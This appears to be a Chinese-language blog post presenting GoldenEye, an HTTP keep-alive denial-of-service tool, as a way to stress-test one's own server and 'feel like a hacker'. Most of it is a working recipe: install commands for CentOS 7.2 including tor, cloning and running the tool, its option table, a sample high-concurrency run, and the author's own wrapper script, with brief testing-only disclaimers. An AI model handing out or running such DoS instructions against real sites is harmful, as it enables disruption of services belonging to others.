
每天都会收到阿里云推送的短信,说服务器被攻击了。突生想法,自己试试来对自己服务器做压力测试。到 GitHub 搜了一圈,发现了一个叫 GoldenEye 的项目。和大家分享一下,体验一把当 Hacker 的瘾。不过只会 DOS 攻击的是伪 Hacker ,粗鲁霸道,想要成为一名真正的 Hacker 还是要深入学习。
GoldenEye is an python app for SECURITY TESTING PURPOSES ONLY!
GoldenEye is a HTTP DoS Test Tool.
Attack Vector exploited: HTTP Keep Alive + NoCache
该项目只用于 DOS 测试,请勿作他用!
测试环境: Centos 7.2
具体步骤如下:
yum install git wget -y
wget http://dl.fedoraproject.org/pub/epel/7/x86_64/e/epel-release-7-9.noarch.rpm
rpm -ivh epel-release-7-9.noarch.rpm
yum install tor -y
git clone https://github.com/jseidl/GoldenEye.git
cd GoldenEye
chmod +x goldeneye.py
service tor start
./goldeneye.py [OPTIONS]
用法也很简单
USAGE: ./goldeneye.py <url> [OPTIONS]
OPTIONS:
| Flag | Description | Default |
|---|---|---|
| -u, –useragents | File with user-agents to use | (default: randomly generated) |
| -w, –workers | Number of concurrent workers | (default: 50) |
| -s, –sockets | Number of concurrent sockets | (default: 30) |
| -m, –method | HTTP Method to use ‘get’ or ‘post’ or ‘random’ | (default: get) |
| -d, –debug | Enable Debug Mode [more verbose output] | (default: False) |
| -h, –help | Shows this help |
“Strikes Deffered” variable saying what number of strikes was blocked or crashed. In brackets says what number of connection timed out was responded (or responded error 500).
示范:./goldeneye.py https://127.0.0.1 -w 200 -s 100
开始测试之后,注意 Strikes Deffered 提示,这个代表了攻击阻碍或崩溃的数量。圆括号里的数字则表示链接超时或者 error 500 的数量。
我写了一个蹩脚的脚本供 Centos7 使用,详见:https://github.com/zyl6698/Goldendos
用法:
git clone https://github.com/zyl6698/Goldendos && cd Goldendos
chmod +x hack1.0.sh
./hack1.0.sh
食用愉快!
在树莓派上同样运行成功,有设备的同学可以尝试一下。
再次申明:该项目只能用于学习测试,不能用于其他!
